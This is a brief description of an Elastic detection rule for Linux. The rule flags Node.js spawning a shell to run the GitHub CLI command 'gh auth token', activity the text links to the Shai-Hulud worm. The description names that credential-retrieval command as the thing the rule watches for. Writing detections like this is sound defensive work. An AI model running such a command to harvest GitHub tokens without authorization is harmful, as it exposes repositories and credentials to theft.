This detection rule, authored by Elastic, aims to identify potentially malicious activity involving the Node.js runtime when it spawns a shell to execute the GitHub CLI command for retrieving an authentication token. This command, "gh auth token," can be exploited by adversaries to gain unauthorized access to GitHub repositories, leading to potential exfiltration of sensitive data or execution of harmful actions. The activity in question was noted in real-world scenarios associated with the Shai-Hulud worm. The rule specifically targets Linux environments and requires data from Elastic Defend for its operation. With a medium severity rating and a risk score of 47, it leverages Elastic's query language (EQL) to capture process events that meet specific parameters. Successful detection indicates that the process was initiated by Node.js, followed by executing shell commands indicative of GitHub CLI interactions for credential access. The rule addresses both credential access and discovery tactics outlined in the MITRE ATT&CK framework.